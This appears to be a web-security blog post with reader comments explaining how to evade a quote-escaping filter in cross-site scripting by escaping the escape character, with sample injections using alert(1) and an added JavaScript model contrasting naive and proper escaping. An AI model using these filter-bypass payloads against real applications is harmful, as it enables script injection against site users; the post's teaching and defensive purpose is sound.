True Stories of the TRC-Web Application Security

Escaping Escapes

Sometimes a server will escape special characters that are injected. For instance, injecting a " character and having it reflect as \":

Injection: xss"

Reflection:

x="xss\"";y=42;

Fail.

Sometimes, ironically enough, you can outsmart filters by using their own tricks against them. Try escaping their escape character like this:

Injection: xss\"

Reflection:

x="xss\\"";y=42;

Success!

However, if the server also escapes your injected \ as \\, this technique will not work:

Injection: xss\"

Reflection:

x="xss\\\"";y=42;

Not fun.

If you’re able to break out by escaping their escape, you’ll need to blend back in with something other than a ", because the escaping process breaks the syntax:

Injection: xss\"*alert(1)*"

Reflection:

x="xss\\"*alert(1)*\"";y=42;

The *\ following alert(1) is not valid syntax and will cause an error.

So…

Injection: xss\"*alert(1)//

Reflection:

x="xss\\"*alert(1)//";y=42;

Commenting out the rest is your best bet, unless they also escape your // as \/\/. When this happens, I don’t think there’s much you can do.
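As an added example (not code from the original post), the quote-only filter described above modelled in JavaScript beside a correct escaper, with a small tokenizer check that tells whether each reflected snippet keeps the injected value inside the string literal:

```javascript
// Added example, not code from the original post: models the server-side filter
// the article describes (escape " only) beside a correct one, rebuilds the
// reflected snippet x="<value>";y=42; and checks whether the injected value is
// still confined to the string literal once a JavaScript parser reads it.

// Naive filter from the article: escapes " but treats \ as an ordinary character.
function naiveEscape(value) {
  return value.replace(/"/g, '\\"');
}

// Hardened filter: escape the escape character first, then ", then / (as \/),
// which is the "escape your // as \/\/" behaviour the article mentions.
function properEscape(value) {
  return value.replace(/\\/g, '\\\\').replace(/"/g, '\\"').replace(/\//g, '\\/');
}

// The reflection point from the article: the value lands inside x="...";y=42;
function reflect(escaper, value) {
  return 'x="' + escaper(value) + '";y=42;';
}

// The approach from the first comment: let a JSON encoder quote and escape.
function reflectJson(value) {
  return 'x=' + JSON.stringify(value) + ';y=42;';
}

// Index of the " that closes the first string literal, honouring \ escapes
// the way a JavaScript tokenizer does; -1 if the literal never closes.
function stringLiteralEnd(js) {
  for (let i = js.indexOf('"') + 1; i < js.length; i++) {
    if (js[i] === '\\') { i++; continue; }   // escaped character, skip it
    if (js[i] === '"') return i;
  }
  return -1;
}

// Everything the parser sees as code after the literal closes.
function codeAfterLiteral(js) {
  const end = stringLiteralEnd(js);
  return end === -1 ? null : js.slice(end + 1);
}

// The value stayed inside the string iff only the page's own ;y=42; follows it.
function valueStaysInString(js) {
  return codeAfterLiteral(js) === ';y=42;';
}
```

Running the article's three injections through naiveEscape reproduces the Fail / Success / leaked code results above; properEscape and reflectJson keep all of them inside the literal.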

Escaping escapes reminds me of the classic movie moment, when a bad guy gets the drop on a good guy, but then another good guy gets the drop on the bad guy. It always cracks me up when this evasion technique works.

Tags: Cross Site Scripting, JavaScript, XSS
  • http://bluesmoon.info/ Phiip

    If something’s gonna be used as a javascript string, I just json_encode it first. That takes care of escaping everything that’s special and enclosing the resulting string in quotes.

  • Dmitry K

    If you are in a javascript context (like in this article) sometimes you can use an HTML comment at the end of your injection string, <!--, to make it work
